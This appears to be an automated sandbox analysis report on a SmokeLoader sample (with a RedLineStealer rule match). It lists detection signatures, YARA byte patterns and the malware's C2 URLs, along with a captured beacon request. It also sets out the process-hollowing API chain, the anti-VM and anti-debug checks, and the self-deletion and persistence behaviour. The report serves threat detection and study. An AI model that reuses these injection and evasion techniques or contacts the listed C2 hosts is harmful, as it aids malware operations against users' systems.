Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:764038
MD5:6b8486d9065fb3105e8c8a14c58dd0ed
SHA1:b341177019c21155a02477b71a613b6c427cf067
SHA256:6acc6c36c8492b91f4fe44aeabc3ad69eea2765259108bacbfbc9b57bff24133
Tags:exe
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Injects a PE file into a foreign processes
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Contains functionality to inject code into remote processes
Deletes itself after installation
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • file.exe (PID: 4700 cmdline: C:\Users\user\Desktop\file.exe MD5: 6B8486D9065FB3105E8C8A14C58DD0ED)
    • file.exe (PID: 3340 cmdline: C:\Users\user\Desktop\file.exe MD5: 6B8486D9065FB3105E8C8A14C58DD0ED)
      • explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • dubewge (PID: 5576 cmdline: C:\Users\user\AppData\Roaming\dubewge MD5: 6B8486D9065FB3105E8C8A14C58DD0ED)
    • dubewge (PID: 4036 cmdline: C:\Users\user\AppData\Roaming\dubewge MD5: 6B8486D9065FB3105E8C8A14C58DD0ED)
  • cleanup
{"C2 list": ["http://host-file-host6.com/", "http://host-host-file8.com/"]}
SourceRuleDescriptionAuthorStrings
00000002.00000000.377043487.0000000002971000.00000020.80000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000002.00000000.377043487.0000000002971000.00000020.80000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x2f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000006.00000002.453507425.0000000000460000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000006.00000002.453507425.0000000000460000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x6f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      00000001.00000002.389552753.00000000005A1000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        Click to see the 7 entries
        SourceRuleDescriptionAuthorStrings
        1.0.file.exe.400000.6.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          6.0.dubewge.400000.4.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            1.0.file.exe.400000.4.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              6.0.dubewge.400000.6.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                0.2.file.exe.4915a0.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                  Click to see the 5 entries
                  No Sigma rule has matched
                  Timestamp:192.168.2.584.21.172.15949704802851815 12/09/22-10:55:01.226456
                  SID:2851815
                  Source Port:49704
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: http://host-host-file8.com/URL Reputation: Label: malware
                  Source: host-file-host6.comVirustotal: Detection: 19%Perma Link
                  Source: host-host-file8.comVirustotal: Detection: 17%Perma Link
                  Source: file.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\dubewgeJoe Sandbox ML: detected
                  Source: 1.0.file.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                  Source: 6.0.dubewge.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                  Source: 1.0.file.exe.400000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                  Source: 6.0.dubewge.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                  Source: 1.0.file.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                  Source: 6.0.dubewge.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                  Source: 1.0.file.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                  Source: 6.0.dubewge.400000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                  Source: 00000006.00000002.453507425.0000000000460000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://host-file-host6.com/", "http://host-host-file8.com/"]}
                  Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: Binary string: C:\ruren_yinevekow_hurawiya.pdb source: file.exe, dubewge.2.dr
                  Source: Binary string: DC:\ruren_yinevekow_hurawiya.pdb source: file.exe, dubewge.2.dr

                  Networking

                  barindex
                  Source: C:\Windows\explorer.exeDomain query: host-file-host6.com
                  Source: C:\Windows\explorer.exeDomain query: host-host-file8.com
                  Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.5:49704 -> 84.21.172.159:80
                  Source: Malware configuration extractorURLs: http://host-file-host6.com/
                  Source: Malware configuration extractorURLs: http://host-host-file8.com/
                  Source: Joe Sandbox ViewASN Name: COMBAHTONcombahtonGmbHDE COMBAHTONcombahtonGmbHDE
                  Source: Joe Sandbox ViewIP Address: 84.21.172.159 84.21.172.159
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://quargeql.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 158Host: host-file-host6.com
                  Source: explorer.exe, 00000002.00000000.376090770.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.348098249.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.316275876.000000000091F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                  Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://quargeql.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 158Host: host-file-host6.com
                  Source: unknownDNS traffic detected: queries for: host-file-host6.com

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: Yara matchFile source: 1.0.file.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.0.dubewge.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.file.exe.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.0.dubewge.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.4915a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.0.dubewge.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.dubewge.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.dubewge.7e15a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.file.exe.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000000.377043487.0000000002971000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.453507425.0000000000460000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.389552753.00000000005A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.389415953.0000000000580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.453701840.0000000001F51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

                  System Summary

                  barindex
                  Source: 00000002.00000000.377043487.0000000002971000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000006.00000002.453507425.0000000000460000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000001.00000002.389552753.00000000005A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000005.00000002.437430133.0000000000492000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000001.00000002.389415953.0000000000580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000000.00000002.305126000.0000000000603000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000006.00000002.453701840.0000000001F51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 00000002.00000000.377043487.0000000002971000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000006.00000002.453507425.0000000000460000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000001.00000002.389552753.00000000005A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000005.00000002.437430133.0000000000492000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000001.00000002.389415953.0000000000580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000000.00000002.305126000.0000000000603000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000006.00000002.453701840.0000000001F51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004148D10_2_004148D1
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413C950_2_00413C95
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040CD0A0_2_0040CD0A
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004141D90_2_004141D9
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004156320_2_00415632
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004137510_2_00413751
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00407BA10_2_00407BA1
                  Source: C:\Users\user\Desktop\file.exeCode function: String function: 00408168 appears 45 times
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00490110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,0_2_00490110
                  Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0040180C Sleep,NtTerminateProcess,1_2_0040180C
                  Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00401818 Sleep,NtTerminateProcess,1_2_00401818
                  Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00401822 Sleep,NtTerminateProcess,1_2_00401822
                  Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00401826 Sleep,NtTerminateProcess,1_2_00401826
                  Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00401834 Sleep,NtTerminateProcess,1_2_00401834
                  Source: C:\Users\user\AppData\Roaming\dubewgeCode function: 5_2_007E0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,5_2_007E0110
                  Source: C:\Users\user\AppData\Roaming\dubewgeCode function: 6_2_0040180C Sleep,NtTerminateProcess,6_2_0040180C
                  Source: C:\Users\user\AppData\Roaming\dubewgeCode function: 6_2_00401818 Sleep,NtTerminateProcess,6_2_00401818
                  Source: C:\Users\user\AppData\Roaming\dubewgeCode function: 6_2_00401822 Sleep,NtTerminateProcess,6_2_00401822
                  Source: C:\Users\user\AppData\Roaming\dubewgeCode function: 6_2_00401826 Sleep,NtTerminateProcess,6_2_00401826
                  Source: C:\Users\user\AppData\Roaming\dubewgeCode function: 6_2_00401834 Sleep,NtTerminateProcess,6_2_00401834
                  Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\dubewge C:\Users\user\AppData\Roaming\dubewge
                  Source: C:\Users\user\AppData\Roaming\dubewgeProcess created: C:\Users\user\AppData\Roaming\dubewge C:\Users\user\AppData\Roaming\dubewge
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\dubewgeProcess created: C:\Users\user\AppData\Roaming\dubewge C:\Users\user\AppData\Roaming\dubewgeJump to behavior
                  Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\dubewgeJump to behavior
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@6/2@5/1
                  Source: C:\Users\user\Desktop\file.exeCommand line argument: _.K>0_2_004058A1
                  Source: C:\Users\user\Desktop\file.exeCommand line argument: Cgx0_2_004058A1
                  Source: C:\Users\user\Desktop\file.exeCommand line argument: tf710_2_004058A1
                  Source: C:\Users\user\Desktop\file.exeCommand line argument: yLmc0_2_004058A1
                  Source: C:\Users\user\Desktop\file.exeCommand line argument: /fY.0_2_004058A1
                  Source: C:\Users\user\Desktop\file.exeCommand line argument: NKR[0_2_004058A1
                  Source: C:\Users\user\Desktop\file.exeCommand line argument: mf:0_2_004058A1
                  Source: C:\Users\user\Desktop\file.exeCommand line argument: 5[$'0_2_004058A1
                  Source: C:\Users\user\Desktop\file.exeCommand line argument: ]q0r0_2_004058A1
                  Source: C:\Users\user\Desktop\file.exeCommand line argument: EuY0_2_004058A1
                  Source: C:\Users\user\Desktop\file.exeCommand line argument: +F280_2_004058A1
                  Source: C:\Users\user\Desktop\file.exeCommand line argument: eVS0_2_004058A1
                  Source: C:\Users\user\Desktop\file.exeCommand line argument: pumitafoto0_2_004058A1
                  Source: C:\Users\user\Desktop\file.exeCommand line argument: msimg32.dll0_2_004058A1
                  Source: C:\Users\user\Desktop\file.exeCommand line argument: 0.txt0_2_004058A1
                  Source: C:\Users\user\Desktop\file.exeCommand line argument: kernel32.dll0_2_004058A1
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: C:\ruren_yinevekow_hurawiya.pdb source: file.exe, dubewge.2.dr
                  Source: Binary string: DC:\ruren_yinevekow_hurawiya.pdb source: file.exe, dubewge.2.dr
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004081AD push ecx; ret 0_2_004081C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00491970 push ebx; iretd 0_2_004919B7
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00491977 push ebx; iretd 0_2_004919B7
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0049198B push ebx; iretd 0_2_004919B7
                  Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004011D0 push ebx; iretd 1_2_00401217
                  Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004011D7 push ebx; iretd 1_2_00401217
                  Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004011EB push ebx; iretd 1_2_00401217
                  Source: C:\Users\user\AppData\Roaming\dubewgeCode function: 5_2_007E1977 push ebx; iretd 5_2_007E19B7
                  Source: C:\Users\user\AppData\Roaming\dubewgeCode function: 5_2_007E1970 push ebx; iretd 5_2_007E19B7
                  Source: C:\Users\user\AppData\Roaming\dubewgeCode function: 5_2_007E198B push ebx; iretd 5_2_007E19B7
                  Source: C:\Users\user\AppData\Roaming\dubewgeCode function: 6_2_004011D0 push ebx; iretd 6_2_00401217
                  Source: C:\Users\user\AppData\Roaming\dubewgeCode function: 6_2_004011D7 push ebx; iretd 6_2_00401217
                  Source: C:\Users\user\AppData\Roaming\dubewgeCode function: 6_2_004011EB push ebx; iretd 6_2_00401217
                  Source: file.exeStatic PE information: section name: .weme
                  Source: file.exeStatic PE information: section name: .hosetot
                  Source: dubewge.2.drStatic PE information: section name: .weme
                  Source: dubewge.2.drStatic PE information: section name: .hosetot
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DAD4 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_0040DAD4
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\dubewgeJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\dubewgeJump to dropped file

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\file.exeJump to behavior
                  Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\dubewge:Zone.Identifier read attributes | deleteJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: dubewge, 00000006.00000002.453579441.000000000048B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
                  Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\dubewgeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\dubewgeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\dubewgeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\dubewgeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\dubewgeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\dubewgeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Windows\explorer.exe TID: 5564Thread sleep count: 665 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 5568Thread sleep count: 381 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 5568Thread sleep time: -38100s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 5560Thread sleep count: 396 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 5560Thread sleep time: -39600s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 3388Thread sleep count: 564 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 2940Thread sleep count: 224 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 5388Thread sleep count: 310 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 5388Thread sleep time: -31000s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exeLast function: Thread delayed
                  Source: C:\Windows\explorer.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-8885
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 665Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 381Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 396Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 564Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                  Source: explorer.exe, 00000002.00000000.332334752.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                  Source: explorer.exe, 00000002.00000000.316275876.000000000091F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: explorer.exe, 00000002.00000000.332804136.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
